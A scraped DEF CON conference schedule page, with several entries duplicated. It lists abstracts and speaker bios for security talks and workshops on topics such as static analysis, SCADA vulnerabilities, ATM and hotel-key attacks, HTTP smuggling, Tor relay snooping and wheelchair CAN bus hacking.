Recent advances in the field of formal program analysis have led to development of theories and tools that can, given a program as input, either guarantee absence of certain types of errors or raise alarms to alert of possible weaknesses in the given program. Sounds like black magic? The goal of this training is to de-mystify the science behind automated program analysis and build a solid foundation for attendees to start building their own tools that can automatically analyze and certify code correctness.
The workshop will cover the challenges in automated program analysis, what is possible and what is not possible, and why. We will focus on using Abstract Interpretation, a widely used formal framework, for describing sound by construction program analysis algorithms as approximations of semantics of the language. Finally, in the hands-on session, we will build our own code analyzer for a simple language that can analyze any program written in that language and issue certificates of correctness.
Vivek Notani is a PhD student at University of Verona, under Dr. Roberto Giacobazzi. Previously, Vivek used to work as a research scholar at University of Louisiana at Lafayette (USA) focusing on dynamic methods of malware analysis and machine learning applications to malware analysis and reverse engineering. His research at UL Lafayette led to the creation of Virusbattle, an automated malware analysis system that harvests intelligence from large malware repositories which was presented at BlackHat last year. VirusBattle has since been commercialized by Cythereal LLC. USA. Early on in his career, Vivek used to work in humanoid robotics and helped create Acyut, series of India's first indigenously developed humanoid robot which created a world record in humanoid weightlifting at FIRA-2010.
Roberto Giacobazzi is a senior professor of computer science at University of Verona and the Scientific Leader of the SPY-Lab. He received his Ph.D. in Computer Science in 1993 from the University of Pisa. From 1993 to 1995 he had a Post Doctoral Research position at Laboratoire d'Informatique (LIX), Ecole Polytechnique (Paris) in the equipe Cousot, the creator of the theory of Abstract Interpretation. His research interests include abstract interpretation, static program analysis, semantics of programming languages, program verification, abstract model-checking, program transformation and optimization, digital asset protection, code obfuscation, software watermarking and lattice theory. He is author of more than 100 publications in international journals and conferences and he is involved in national (italian) and international (european) research projects in the field of static program analysis. His main current research interest is in formal methods for systematic design of domains and transfer functions or abstract interpretation, with application in security, digital asset protection, code obfuscation, watermarking, malware analysis, semantics, program analysis, and abstract model-checking. In the past, he gave a declarative semantics for Prolog control features and he studied new methodologies to design static program analyzers and optimization techniques for logic and constraint-based languages by abstract interpretation. In lattice theory he contributed to understanding of the structure of the lattice of closure operators and complete congruence relations on complete lattices. He is in the Steering Committee of the Static Analysis Symposium and of the ACM Conference on Principles of Programming Languages, POPL. Dr. Giacobazzi's research in abstract interpretation led to the creation of Julia in 2006, which has since been acquired by the Corvallis Group,a leading firm in software development and assurance in the banking market.
Max Class Size: 55
Prerequisites for students:
- Programming background in C++
- Understanding of Software development and testing methods
- Basic understanding of these theories will be helpful but is not required: static analysis, dynamic analysis, lattice theory, FixPoint Theory and, abstract interpretation.
Materials or Equipment students will need to bring to participate: Laptop with Linux. Instructors will be using Ubuntu.
Please install IKOS library. Download from:
https://ti.arc.nasa.gov/opensource/ikos/
Installation instructions available here:
https://ti.arc.nasa.gov/m/opensource/downloads/ikos/INSTALL_linux.pdf
Return to Index
Workshops - Las Vegas Ballroom 1 - Saturday - 14:00-18:00
Guaranteed Security
Vivek Notani PhD Student University of Verona
Dr. Roberto Giacobazzi Senior Professor, University of Verona
Can you guarantee that the software you created does not contain any runtime errors or data races and would not be susceptible to buffer overflow or floating point errors? Can you create a program that can take any arbitrary program as an input and certify it as free from such errors or alert you of possible avenues of errors? Is such a thing even possible? Turns out, yes you can, or at least after this training you will be able to.
Recent advances in the field of formal program analysis have led to development of theories and tools that can, given a program as input, either guarantee absence of certain types of errors or raise alarms to alert of possible weaknesses in the given program. Sounds like black magic? The goal of this training is to de-mystify the science behind automated program analysis and build a solid foundation for attendees to start building their own tools that can automatically analyze and certify code correctness.
The workshop will cover the challenges in automated program analysis, what is possible and what is not possible, and why. We will focus on using Abstract Interpretation, a widely used formal framework, for describing sound by construction program analysis algorithms as approximations of semantics of the language. Finally, in the hands-on session, we will build our own code analyzer for a simple language that can analyze any program written in that language and issue certificates of correctness.
Vivek Notani is a PhD student at University of Verona, under Dr. Roberto Giacobazzi. Previously, Vivek used to work as a research scholar at University of Louisiana at Lafayette (USA) focusing on dynamic methods of malware analysis and machine learning applications to malware analysis and reverse engineering. His research at UL Lafayette led to the creation of Virusbattle, an automated malware analysis system that harvests intelligence from large malware repositories which was presented at BlackHat last year. VirusBattle has since been commercialized by Cythereal LLC. USA. Early on in his career, Vivek used to work in humanoid robotics and helped create Acyut, series of India's first indigenously developed humanoid robot which created a world record in humanoid weightlifting at FIRA-2010.
Roberto Giacobazzi is a senior professor of computer science at University of Verona and the Scientific Leader of the SPY-Lab. He received his Ph.D. in Computer Science in 1993 from the University of Pisa. From 1993 to 1995 he had a Post Doctoral Research position at Laboratoire d'Informatique (LIX), Ecole Polytechnique (Paris) in the equipe Cousot, the creator of the theory of Abstract Interpretation. His research interests include abstract interpretation, static program analysis, semantics of programming languages, program verification, abstract model-checking, program transformation and optimization, digital asset protection, code obfuscation, software watermarking and lattice theory. He is author of more than 100 publications in international journals and conferences and he is involved in national (italian) and international (european) research projects in the field of static program analysis. His main current research interest is in formal methods for systematic design of domains and transfer functions or abstract interpretation, with application in security, digital asset protection, code obfuscation, watermarking, malware analysis, semantics, program analysis, and abstract model-checking. In the past, he gave a declarative semantics for Prolog control features and he studied new methodologies to design static program analyzers and optimization techniques for logic and constraint-based languages by abstract interpretation. In lattice theory he contributed to understanding of the structure of the lattice of closure operators and complete congruence relations on complete lattices. He is in the Steering Committee of the Static Analysis Symposium and of the ACM Conference on Principles of Programming Languages, POPL. Dr. Giacobazzi's research in abstract interpretation led to the creation of Julia in 2006, which has since been acquired by the Corvallis Group,a leading firm in software development and assurance in the banking market.
Max Class Size: 55
Prerequisites for students:
- Programming background in C++
- Understanding of Software development and testing methods
- Basic understanding of these theories will be helpful but is not required: static analysis, dynamic analysis, lattice theory, FixPoint Theory and, abstract interpretation.
Materials or Equipment students will need to bring to participate: Laptop with Linux. Instructors will be using Ubuntu.
Please install IKOS library. Download from:
https://ti.arc.nasa.gov/opensource/ikos/
Installation instructions available here:
https://ti.arc.nasa.gov/m/opensource/downloads/ikos/INSTALL_linux.pdf
Return to Index
DEFCON - DEF CON 101 - Thursday - 15:00-15:59
Hacker Fundamentals and Cutting Through Abstraction
LosT
Continuing the series of hacker foundational skills, YbfG jvyy nqqerff shaqnzragny fxvyyf gung rirel unpxre fubhyq xabj. Whfg sbe sha jr jvyy nyfb tb sebz gur guerr onfvp ybtvp tngrf gb n shapgvbany cebprffbe juvyr enpvat n pybpx. Qb lbh xabj ubj n cebprffbe ernyyl jbexf? Jul qb lbh pner? Pbzr svaq bhg. Bu, naq pelcgb.
Ryan "1o57" Clarke self-identifies as a hacker. Formerly a member of the Advanced Programs Group (APG) at Intel, he continues to do 'security stuff' for other companies and groups. Professionally LosT's history includes working for various groups and companies, as well as for the University of Advancing Technology where he set up the robotics and embedded systems degree program. He has consulted for the Department of Energy, Fortune 50 companies, and multiple domestic and international organizations. For DEFCON he has created the Hardware Hacking Village, the LosT@Defcon Mystery Challenge, and conference badges, cryptography, and puzzles. As DEFCON’s official cryptographer and puzzle master, his activities have included aspects of network intrusion and security, social engineering, RED and BLUE team testing, mathematics, linguistics, physical security, and various other security and hacker related skillsets. 1o57's academic background and and interests include computational mathematics, linguistics, cryptography, electrical engineering, computer systems engineering and computer science-y stuff.
Return to Index
DEFCON - Track Three - Saturday - 14:00-14:59
Hacker-Machine Interface - State of the Union for SCADA HMI Vulnerabilities
Brian Gorenc Senior Manager, Trend Micro Zero Day Initiative
Fritz Sands Security Researcher, Trend Micro Zero Day Initiative
Over the last year, synchronized and coordinated attacks against critical infrastructure have taken center stage. Remote cyber intrusions at three Ukrainian regional electric power distribution companies in December 2015 left approximately 225,000 customers without power. Malware, like BlackEnergy, is being specially developed to target supervisory control and data acquisition (SCADA) systems. Specifically, adversaries are focusing their efforts on obtaining access to the human-machine interface (HMI) solutions that act as the main hub for managing the operation of the control system. Vulnerabilities in these SCADA HMI solutions are, and will continue to be, highly valuable as we usher in this new era of software exploitation. This talk covers an in-depth analysis performed on a corpus of 200+ confirmed SCADA HMI vulnerabilities. It details out the popular vulnerability types discovered in HMI solutions developed by the biggest SCADA vendors, including Schneider Electric, Siemens, General Electric, and Advantech. It studies the weaknesses in the technologies used to develop HMI solutions and describes how critical vulnerabilities manifest in the underlying code. The talk will compare the time-to-patch performance of various SCADA vendors along with a comparison of the SCADA industry to the rest of the software industry. Finally, using the data presented, additional guidance will be provided to SCADA researchers along with a prediction on what we expect next in attacks that leverage SCADA HMI vulnerabilities.
Brian Gorenc is the senior manager of Vulnerability Research with Trend Micro. In this role, Gorenc leads the Zero Day Initiative (ZDI) program, which represents the world’s largest vendor-agnostic bug bounty program. His focus includes analyzing and performing root-cause analysis on hundreds of zero-day vulnerabilities submitted by ZDI researchers from around the world. The ZDI works to expose and remediate weaknesses in the world’s most popular software. Brian is also responsible for organizing the ever-popular Pwn2Own hacking competitions.
Twitter: @thezdi, @maliciousinput
Fritz Sands is a security researcher with Trend Micro's Zero Day Initiative. In this role, he analyzes and performs root-cause analysis on vulnerabilities submitted to the ZDI program, which is the world's largest vendor-agnostic bug bounty program. Fritz also focuses on writing tools to perform static and dynamic analysis for discovering vulnerabilities. Prior to joining the ZDI in 2014, Sands was in Microsoft's Trustworthy Computing and Secure Windows Initiative operations where he audited Windows code and developed dynamic analysis tools, and before that he was a system developer for multiple iterations of Microsoft Windows.
Twitter: @FritzSands
www.zerodayinitiative.com
Return to Index
DEFCON - Track Two - Sunday - 10:00-10:59
Hacking Hotel Keys and Point of Sale Systems: Attacking Systems Using Magnetic Secure Transmission
Weston Hecker Senior Security Engineer & Pentester, Rapid7
Take a look at weaknesses in Point of sale systems and the foundation of hotel key data and the Property management systems that manage the keys. Using a modified MST injection method Weston will demonstrate several attacks on POS and Hotel keys including brute forcing other guest’s keys from your card information as a start point. And methods of injecting keystrokes into POS systems just as if you had a keyboard plugged into the system. This includes injecting keystrokes to open cash drawer and abusing Magstripe based rewards programs that are used a variety of environments from retail down to rewards programs in Slot Machines.
11 Years Pen-testing, 12 years’ security research and programming experience. Working for a security Company in the Midwest Weston has recently Spoken at DEF CON 22 & 23, Black Hat USA 2016, Enterprise Connect 2016 ISC2-Security Congress, SC-Congress Toronto, HOPE11, BSIDES Boston and over 50 other speaking engagements from telecom Regional events to University’s on security subject matter. Working with A Major University's research project with Department of Homeland Security on 911 emergency systems and attack mitigation. Attended school in Minneapolis Minnesota. Computer Science and Geophysics. Found several vulnerabilities’ in very popular software and firmware. Including Microsoft, Qualcomm, Samsung, HTC, Verizon.
Return to Index
Workshops - Las Vegas Ballroom 6 - Thursday - 10:00-14:00
Hacking Network Protocols using Kali
Thomas Wilhelm Associate Professor, NSACAE University
Todd KendallSecurity Consultant
There are a lot of hacking tutorials on how to compromise servers, but what about network devices?
In this workshop, we will demonstrate how to conduct penetration tests against a number of different network protocols, specifically those at layer 2 and 3 of the OSI model, in order to assess and circumvent the security of an organization. Participants will be able to watch a demonstration on how to leverage insecurities in different protocols, and replicate the attacks themselves in a lab environment at the workshop. In addition, we will discuss what steps network engineers can do to limit the insecurities.
This workshop will contain network devices in which participants will be able to connect to and perform the demonstrated attacks. Participation will be reduced since network equipment resources are limited, unless additional lab equipment can be procured.
Thomas Wilhelm has been an associate professor at an NSACAE university, who has taught information assurance for many years at both the masters and undergraduate level. He has been a penetration tester and team lead for fortune 100 companies, and spent the last 20+ years involved in information security.
Thomas has written and authored numerous articles and books over the years on hacking; the latest is titled “Professional Penetration Testing (vol 2),” published by Syngress, which has been printed in multiple languages. Thomas holds two masters degrees (MSCS, MSM) and maintains the following certifications: ISSMP, CISSP, CCNP Security, SCSECA, SCNA, SCSA, IEM, IAM
Todd Kendall is a security consultant with extensive experience in both the commercial and government security world. Todd is currently responsible for performing vulnerability assessments on operational networks to Fortune 100 companies, and has been heavily involved in incident response and management for finance, healthcare, and utility industries. Todd has expe
Max Class Size: 32
Prerequisites for students: It is required for students to understand the OSI model and specifics of well-known network protocols, particularly those found at layer 2 and layer 3 of the OSI model.
Materials or Equipment students will need to bring to participate: Participants should have a laptop that contains an up to date Kali Linux image. In addition, if they want to participate in actual network protocol attacks, they should bring CAT5 cables for connectivity. This class will not spend time getting students online - participants should already be familiar with configuring static IP addresses and/or DHCP for their systems. Because participants will be able to connect to a lab environment with active exploits, it is suggested that students use a computer system that can be easily re-imaged at the end of the workshop.
Return to Index
DEFCON - Track One - Friday - 17:00-17:59
Hacking Next-Gen ATM's From Capture to Cashout
Weston Hecker Senior Security Engineer & Pentester, Rapid7
MV (Chip & Pin) card ATM's are taking over the industry with the deadlines passed and approaching the industry rushes ATM's to the market. Are they more secure and hack proof? Over the past year I have worked at understanding and breaking the new methods that ATM manufactures have implemented on production ‘Next Generation’ Secure ATM systems. This includes bypassing Anti-skimming/Anti-Shimming methods introduced to the latest generation ATM's. along with NFC long range attack that allows real-time card communication over 400 miles away. This talk will demonstrate how a $2000-dollar investment criminals can do unattended ‘cash outs’ touching also on failures of the past with EMV implementations and how credit card data of the future will most likely be sold with the new EMV data having such a short life span.
With a rise of the machines theme demonstration of ‘La-Cara’ and automated Cash out machine that works on Current EMV and NFC ATM's it is an entire fascia Placed on the machine to hide the auto PIN keyboard and flash-able EMV card system that is silently withdrawing money from harvested card data. This demonstration of the system can cash out around $20,000/$50,000 in 15 min.
11 Years Pen-testing, 12 years’ security research and programming experience. Working for a security Company in the Midwest Weston has recently Spoken at DEF CON 22 & 23, Black Hat USA 2016, Enterprise Connect 2016 ISC2-Security Congress, SC-Congress Toronto, HOPE11, BSIDES Boston and over 50 other speaking engagements from telecom Regional events to University’s on security subject matter. Working with A Major University's research project with Department of Homeland Security on 911 emergency systems and attack mitigation. Attended school in Minneapolis Minnesota. Computer Science and Geophysics. Found several vulnerabilities’ in very popular software and firmware. Including Microsoft, Qualcomm, Samsung, HTC, Verizon.
Return to Index
BHV - Skyview 4 - Sunday - 11:00-11:59
Speaker: Scott Novich
About Scott Novich:
"Great Scott" / Scott Novich is Co-Founder and CTO at NeoSensory, Inc.-- a wearable technology startup that gives people new senses. It is a spin-off of his PhD research with his co-founder, Chief Science Officer, and former neuroscientist PhD advisor,, Dr. David Eagleman.
Abstract:
"Sensory substitution"--mapping information from one sense to another--has been one of neuroscience's most underground research areas for decades. Recently, it has been truly enabled by inexpensive computing power and compact energy storage. In this talk, I will cover my PhD work on the topic and how it has enabled not just providing people with preexisting senses, but entirely new senses.
Return to Index
BHV - Skyview 4 - Saturday - 10:30-10:59
Speakers: Travis Lawrence
About Travis:
Travis Lawrence is currently a PhD candidate in Quantitative and Systems Biology at University of California, Merced. He developed an interest in both biodiversity and computers early in life. During college, he stumbled into the field of evolutionary biology which allowed him to pursue his interests in computer programming and biodiversity. The questions that are of the most interest to him are at the interface of evolutionary biology, genomics and bioinformatics.
Abstract:
Recent advances in genome editing have quickly turned ideas thought restricted to science fiction into reality such as custom synthetic organisms and designer babies. These technologies rely on the fidelity of the genetic code, which translates nucleotides into proteins. The underlying mechanism of translation is well understood where triplets of nucleotides, known as codons, are recognized by transfer RNAs with complementally nucleotide triplets. These transfer RNAs carry one of twenty amino acids which are then added to the growing protein chain by the ribosome. However, relatively little work has examined how a transfer RNA that recognizes a certain codon always carries the correct amino acid. The rules that determine which amino acid a transfer RNA carries have been termed the second genetic code. I have developed a computational method based on information theory that can elucidate the second genetic code from genomic sequences. Interestingly, the second genetic code is highly variable between organisms unlike the genetic code which is relatively static. I will present how my method cracks the second genetic code and how the variability of the second genetic code can be exploited to develop new treatments to combat bacterial infections and parasites, create targeted bio-controls to combat invasive species, and expand the genetic code to incorporate exotic amino acids.
Return to Index
BHV - Skyview 4 - Saturday - 10:30-10:59
Speakers: Travis Lawrence
About Travis:
Travis Lawrence is currently a PhD candidate in Quantitative and Systems Biology at University of California, Merced. He developed an interest in both biodiversity and computers early in life. During college, he stumbled into the field of evolutionary biology which allowed him to pursue his interests in computer programming and biodiversity. The questions that are of the most interest to him are at the interface of evolutionary biology, genomics and bioinformatics.
Abstract:
Recent advances in genome editing have quickly turned ideas thought restricted to science fiction into reality such as custom synthetic organisms and designer babies. These technologies rely on the fidelity of the genetic code, which translates nucleotides into proteins. The underlying mechanism of translation is well understood where triplets of nucleotides, known as codons, are recognized by transfer RNAs with complementally nucleotide triplets. These transfer RNAs carry one of twenty amino acids which are then added to the growing protein chain by the ribosome. However, relatively little work has examined how a transfer RNA that recognizes a certain codon always carries the correct amino acid. The rules that determine which amino acid a transfer RNA carries have been termed the second genetic code. I have developed a computational method based on information theory that can elucidate the second genetic code from genomic sequences. Interestingly, the second genetic code is highly variable between organisms unlike the genetic code which is relatively static. I will present how my method cracks the second genetic code and how the variability of the second genetic code can be exploited to develop new treatments to combat bacterial infections and parasites, create targeted bio-controls to combat invasive species, and expand the genetic code to incorporate exotic amino acids.
Return to Index
Wireless - Skyview 1 - Friday - 12:30-12:50
Tim O'Shea
Bio
Restless Software Radio Turned Machine Learning Experimentalist
@oshtim
Handing Full Control of the Radio Spectrum over to the Machines
Abstract
Software Radio is hard, lets just teach machines to do it for us. They do pretty much everything else better than us already anyway. This talk will present an overview of recent work applying Machine Learning, especially deep neural networks, to learning in the radio spectrum on top of GNU Radio. Teaching machines to control, sense, and otherwise interact with the radio spectrum faster and more effectively than our handcrafted or manual methods.
|
Return to Index
Workshops - Las Vegas Ballroom 4 - Saturday - 14:00-18:00
Hands-on Cryptography with Python
Sam Bowne Professor, City College San Francisco
Dylan James Smith
Learn essential concepts of cryptography as it is used on the modern Internet, including hashing, symmetric encryption, and asymmetric encryption. Then perform hands-on projects calculating hashes and encrypting secrets with RSA and AES, and compete to solve challenges including cracking Windows and Linux password hashes, short and poorly-chosen RSA public keys, and poorly-chosen AES keys.
All materials, projects, and challenges are freely available at samsclass.info.
Sam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEF CON, HOPE, B-Sides SF, B-Sides LV, and many other cons. He has a PhD and a CISSP and a lot of T-shirts.
Dylan James Smith assisted Sam Bowne with hands-on workshops last year at DEF CON and B-Sides LV. He's a Mac guru and skilled at fixing PC's, Linux problems, and network problems too.
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: Students need to bring a computer that can run Python; any version of Mac, Windows, or Linux will be fine. I will have a few loaner computers for students who don't have a usable computer.
Return to Index
BHV - Skyview 4 - Friday - 14:30-14:59
Speakers: Julian Dana
About Julian:
Julian is a Security Consultant with more than 20 years of experience. He has experience in hands-on security testing and also teaching different technical security trainings. Julian, as a frustrated doctor, was always passionate and curious about the human body.
Abstract:
The software as a service (SaaS) model is same model that we are using for our health...Unbelievable: We are treating symptoms and not curing diseases...
Return to Index
BHV - Skyview 4 - Friday - 14:30-14:59
Speakers: Julian Dana
About Julian:
Julian is a Security Consultant with more than 20 years of experience. He has experience in hands-on security testing and also teaching different technical security trainings. Julian, as a frustrated doctor, was always passionate and curious about the human body.
Abstract:
The software as a service (SaaS) model is same model that we are using for our health...Unbelievable: We are treating symptoms and not curing diseases...
Return to Index
DEFCON - Track One - Sunday - 14:00-14:59
Help, I've got ANTs!!!
Tamas Szakaly Lead Security Researcher, PR-Audit Ltd., Hungary
As stated in my bio, besides computer security I also love fligh simulators and mountain biking. Last year I gave a talk about hacking a flight simulator (among other games), it was only fitting to research something related to my other hobby too. Old day's bike speedometers have evolved quite a bit, and nowadays a lot of bikers (swimmers, runners, ers) do their sport with tiny computers attached to them. These computers do much more than measuring speed: they have GPS, they can store your activities, can be your training buddy, and they can communicate with various sensors (cadence, power meter, heart rate monitors, you name it), mobile phones, each other, and with PCs. One of the communication protocols used by these devices is ANT. Never heard of it? Not surprising, it is not very well known despite being utilized by a lot of gadgets including, but not limited to sport watches, mobile phones, weight scales, some medical devices, and even bicycle lights and radars. When I bought my first bike computer I rationalized it with thoughts like ‘this will help me navigate on the mountain’, or ‘I can track how much I've developed’, but deep down I knew the real reason was my curiosity about this lesser known, lesser researched protocol.
One of my favorite kind of weaknesses are the ones caused by questionable design decisions, and can be spotted without actual hands-on experience with the product itself, just by reading the documentation. Well this is exactly what happened here, I had some attack vectors ready and waiting well before I received the actual device. To top it all, I've also found some implementation bugs after getting my hands on various Garmin devices.
After a brief introduction to the ANT, ANT+ and ANT-FS protocols, I'll explain and demo both the implementation and the protocol weaknesses and reach the already suspected conclusion that ANT and the devices that use it are absolutely insecure: anybody can access your information, turn off your bike light, or even replace the firmware on your sport watch over the air.
Tamas is the lead IT security researcher at PR-Audit Ltd., a company focusing mainly on penetration testing and SIEM software developing. Previously he participated in a cooperation between ELTE Department of Meteorology and the Paks Nuclear Power Plant Ltd. which goal was to develop TREX, a toxic waste emission simulator using CUDA. The scene from RoboCop where the kid defeats the evil robot with just a laptop and a serial cable made a huge impression on him, and after seeing the movie, his path was set: he was bound to be a hacker. His first experiences in this field involved poking around various copy protection schemes, and for this day his favorite areas of expertise are the ones that require some mangling of binary files. Besides computer security he also loves mountain biking and flight simulators.
Twitter: @sghctoma
Facebook: sghctoma
Return to Index
DEFCON - Track One - Sunday - 11:00-11:59
Hiding Wookiees in HTTP - HTTP smuggling is a thing we should know better and care about
regilero DevOp, Makina Corpus
HTTP is everywhere, everybody wants to write an HTTP server. So I wrote mine :-) But mine not fast, and come with an HTTP client which sends very bad HTTP queries. My tool is a stress tester for HTTP servers and proxies, and I wrote it because I found flaws in all HTTP agents that I have checked in the last year i.e. nodejs, golang, Apache httpd, FreeBSD http, Nginx, Varnish and even Haproxy. This presentation will try to explain how flaws in HTTP parsers can be
exploited for bad things; we'll play with HTTP to inject unexpected
content in the user browser, or perform actions in his name.
If you know nothing about HTTP it should be understandable, but you'll have to trust me blindly at the end. If you think you know HTTP, you have no reason to avoid this talk. Then, the short part, I will show you this new Open Source stress tool that I wrote and hope that you will remember it when you'll write your own HTTP parser for you new f** language.
regilero is a DevOp, and this started far before this term. Twenty years in open Source as web developer, sysadmin, web security training, database performance, tuning, audits. Took some time to be on the apache top responder in Stack Overflow, some stuff on SaltStack, made two daughters also. HTTP was the missing piece, like everyone he use it every day, but never took the time to really test the HTTP tools. Last year he started checking... and found some interesting issues.
Twitter: @regilero
Stack Overflow
Return to Index
CPV - Bronze 2 - Saturday - 16:00-18:00
Talk Title:
Highlights from the Matasano Challenges [WORKSHOP]
Speaker Name, Employer or position:
Matt Cheung
Abstract:
The Matasano Challenges were a set of challenges designed to increase understanding of weaknesses in implementations of cryptosystems. In this workshop we will work through a selection of challenges that will give exposure to a variety of attacks. The goal of this workshop is to allow participants to more carefully consider decisions when designing systems that use cryptography as well as how to assess other systems.
* Participation in this workshop will require some programming skills to conduct the attacks.
* Participants should have a laptop with a development environment for the language of their choice. They should also have burp suite or another MITM proxy of their choice.
Bio:
Matt developed his interest and skills in cryptography during graduate work in Mathematics and Computer Science. During this time he had an internship at HRL Laboratories LLC working on implementing elliptic curve support for a Secure (in the honest-but-curious model) Two-Party Computation protocol. From there he implemented the version secure in the malicious model. He currently works as a QA engineer at Veracode, but continues to learn about cryptography in his spare time.
Social media links if provided:
@nullpsifer
Return to Index
SkyTalks - Skyview 3 - Sunday - 13:00-13:59
Speakers: Shane Kemper and the headless chook
Talk: Homologation Friend or Frenemy?
This is a part two of a talk done many years ago that illustrates that in new global era of regulatory demands. Across the globe, organizations are aggressively working on meeting these new regulatory standards using systems engineering. This presentation is a part primer on system engineering and walks the attendees through specific events in the life-cycle (development, qualification, and acceptance) of a product where it is possible to create or limit the potential to create backdoors of a product or system. Additionally, this presentation illustrates how the regulatory demands through homologation can create backdoors and the lack of proper systems engineering could keep backdoors in place
Return to Index
DEFCON - Track One - Friday - 12:00-12:59
Honey Onions: Exposing Snooping Tor HSDir Relays
Guevara Noubir Professor, College of Computer and Information Science, Northeastern University
Amirali Sanatinia PhD candidate, College of Computer and Information Science, Northeastern University
Tor is a widely used anonymity network that protects users' privacy and and identity from corporations, agencies and governments. However, Tor remains a practical system with a variety of limitations, some of which were indeed exploited in the recent past. In particular, Tor's security relies on the fact that a substantial number of its nodes do not misbehave.
Previous work showed the existence of malicious participating Tor relays. For example, there are some Exit nodes that actively interfere with users' traffic and carry out man-in-the-middle attacks. In this work we expose another category of misbehaving Tor relays (HSDirs), that are integral to the functioning of the hidden services and the dark web. The HSDirs act as the DNS directory for the dark web. Because of their nature, detecting their malicious intent and behavior is much harder. We introduce, the concept of honey onions (honions), a framework to detect misbehaving Tor relays with HSDir capability. By setting up and deploying a large scale honion over Tor for more than 72 days, we are able to obtain lower bounds on misbehavior among HSDirs.
We propose algorithms to both estimate the number of snooping HSDirs and identify them, using optimization and feasibility techniques. Our experimental results indicate that during the period of our work at least 110 such nodes were snooping information about hidden services they host. We reveal that more than half of them were hosted on cloud infrastructure and delayed the use of the learned information to prevent easy traceback. Furthermore, we provide the geolocation map of the identified snooping Tor HSDirs
Guevera Noubir holds a PhD in Computer Science from EPFL and is currently a Professor at Northeastern University. His research focuses on privacy, and security. He is a recipient of the National Science Foundation CAREER Award (2005). He led the winning team of the 2013 DARPA Spectrum Cooperative Challenge. Dr. Noubir held visiting research positions at Eurecom, MIT, and UNL. He served as program co-chair of several conferences in his areas of expertise such as the ACM Conference on Security and Privacy in Wireless and Mobile Networks, and IEEE Conference on Communications and Network Security. He serves on the editorial board of the ACM Transaction on Information and Systems Security, and IEEE Transaction on Mobile Computing.
Amirali Sanatinia is a Computer Science PhD candidate at Northeastern advised by Professor Guevara Noubir, and holds a Bachelors degree in CS from St Andrews University. His research focuses on cyber security and privacy, and was covered by venues such as MIT Technology Review and ACM Tech News. He is also the OWASP Boston NEU Student chapter founder and leader
Return to Index
Demolabs - Table 6 - Saturday - 10:00-11:50
HoneyPy and HoneyDB
Phillip Maddux
HoneyPy is an extensible low to medium interaction honeypot written in Python. It can be used as research or production honeypot and can easily be integrated with other tools for alerting and analysis (e.g. Slack, Twitter, Splunk, Elastic Search, etc).
HoneyDB is a web site that collects data from HoneyPy sensors on the Internet and publishes this data in an easy to consume format via APIs.
Phillip Maddux recently joined Signal Sciences as a Senior Solutions Engineer where his goal is to help organizations protect their web applications by enabling visibility into web application attacks and anomalies. Prior to Signal Sciences he focused on application security in the financial services industry. In his spare time he enjoys coding and experimenting with various open source security tools.
Return to Index
IOT - Bronze 4 - Saturday - 10:10-10:50
Hot Wheels: Hacking Electronic Wheelchairs
Stephen Chavez
We are going to exploit a Sunrise Quickie Rhythm power wheelchair that uses the CAN BUS protocol with Arduino/Raspberry PI hardware. We will show how easy it is to inject standard CAN messages to take full control of the chair and block all user input from the main joystick controller. And in addition, provide some basic open source tools to allow people to customize their chairs more easily.
Some electronic wheelchairs use the same signaling bus as cars do: the Controller Area Network (CAN). But they use a specialized commutation protocol like RNET that leverages CAN BUS signaling. The Quickie Rhythm chair uses RNET electronics that we studied inside and out. And it turns out many other chairs use RNET electronics as a standardized protocol. RNET is also closed and proprietary, but we reverse engineered the protocol which will allow people customize their chairs.
Power wheelchairs have become increasingly sophisticated both for increasing their capabilities and for connecting users to the world at large. Some include Bluetooth functionality, which can be an easy way to attack chairs. It is time to teach people to understand how their chairs work, and show them the current status of software security on the chairs.
Special thanks to:
Steven Beaty, my professor who helped me get organized for DEFCON 24. I thank him for doing a ton of meetings with me.
Solid State Depot, a hacker space in Boulder, Colorado. This hackerspace has some of the coolest people I ever met in my life. They allowed me to use their tools and they fully supported me in hacking power wheelchairs.
Metropolitan State University of Denver, they paid all of my expenses for DEFCON.
Stephen specializes in Linux, security, and programming languages such as Java, Go, Python, Rust, PHP, C, C++ , JavaScript, and C#. He has experience in Linux server administration (Apache, Postfix, Dovecot, BIND, NGINX, etc.) as well as software engineering and web design. Stephen has been programming for 10+ years and knows a quite a lot about a wide range of subjects. In his spare time, Stephen is a researcher in the field of computer and internet security and is knowledgeable about hacking, cryptography, and network attacks.
Specter is an awesome hardware hacker that loves to sniff protocols.
@redragonx
Return to Index
Wireless - Skyview 1 - Friday - 12:00-12:20
Jose Gutierrez
Bio
Jose is an academic researcher in wireless security with a focus on Bluetooth Low Energy. He has been a security professional for four years, working as a network defender and incident responder.
Ben Ramsey
Bio
Ben Ramsey, PhD, CISSP, has over a decade of experience in network security research. His work focuses on critical infrastructure protection and low power wireless protocols, such as ZigBee, Z-Wave, Bluetooth Low Energy, and Insteon. He has published in several academic journals and has presented research at multiple conferences, including GLOBECOM, MILCOM, SenseApp, and ShmooCon.
How Do I "BLE Hacking"?
Abstract
"Want to start hacking Bluetooth Low Energy (BLE)? Don't have the time to learn all the things? Look no further! The three goals for this talk: 1) Familiarization : you'll get the basics of the Attribute Protocol (ATT) and the Generic Attribute Profile (GATT), 2) Tools : a quick look at essential tools such as bluez, bleno, ubertooth, PyBT, crackle, scapy, as well as our custom tools, and how to use them, and 3) Fun : along the way, we'll show you how to impose your will on a set of commercially available industrial sensors using techniques like passive credential sniffing, BLE server cloning and impersonation, and reverse engineering at the application layer.
Why? There's arguably no better time to get into BLE security, as it continues to proliferate in a wide variety of markets. Some of the more interesting BLE stuff you can buy include: breathalyzers, pad/bike/door locks, fitness trackers, heart rate monitors, temperature sensors, data loggers, fluid pressure gauges, water well depth readers, garage door openers, automotive OBDII sensors, pressure cookers, running socks, prosthetics, and you guessed it, baby pacifiers.
"
|
Return to Index
IOT - Bronze 4 - Saturday - 12:10-12:59
How the Smart-City becomes Stupid
Denis Makrushin, Kaspersky Lab, Global Research and Analysis Team.
Scare stories around the Internet of Things (IoT) conjure up images of bad guys in hoodies, living for hacking and making the lives of other people harder, inventing millions of ways to infiltrate your life through your gadgets. Probably nobody cares about his smart-home security, but what about Smart-City threats, which affect billions people? A huge number of public IoT devices are vulnerable for potential abuse, potentially endangering users data, networks of companies they belong to, or both. Based on research of various public devices, such as terminals and cameras, we offer a methodology for security analysis of these devices, which would answer the following questions:
How easy it is to compromise a terminal in the park?
What can hackers steal from there?
What can be done with hacked device?
How can the internal network of the installer organization be penetrated?
How to protect public devices from attacks?
